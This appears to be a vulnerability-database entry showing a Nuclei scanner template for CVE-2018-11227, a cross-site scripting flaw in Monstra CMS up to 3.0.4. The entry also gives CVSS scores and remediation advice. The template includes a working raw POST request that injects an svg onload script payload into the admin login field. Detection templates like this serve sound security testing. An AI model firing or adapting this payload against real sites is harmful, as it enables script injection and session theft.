Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-11227
HistoryJan 09, 2023 - 6:03 a.m.

Monstra CMS <=3.0.4 - Cross-Site Scripting

2023-01-0906:03:27
ProjectDiscovery
github.com
6
cve
2018
xss
monstra cms
exploit-db
cross-site scripting

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.01

Percentile

83.4%

Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php.  An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2018-11227

info:
  name: Monstra CMS <=3.0.4 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php.  An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor.
  reference:
    - https://github.com/monstra-cms/monstra/issues/438
    - https://www.exploit-db.com/exploits/44646
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11227
    - https://github.com/monstra-cms/monstra/issues
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-11227
    cwe-id: CWE-79
    epss-score: 0.02135
    epss-percentile: 0.8903
    cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: monstra
    product: monstra_cms
    shodan-query: http.favicon.hash:419828698
    fofa-query: icon_hash=419828698
  tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra

http:
  - raw:
      - |
        POST /admin/index.php?id=pages HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "><svg/onload=alert(document.domain)>"
          - "Monstra"
        case-insensitive: true
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e9e55724df8749ace8f579f6c441325aed843527785b06dc7575d60426297d970220098c8c73fed3d1499735eb40da07fabb36db006d2d8ecb643cb55996bc35aa28:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.01

Percentile

83.4%

Related for NUCLEI:CVE-2018-11227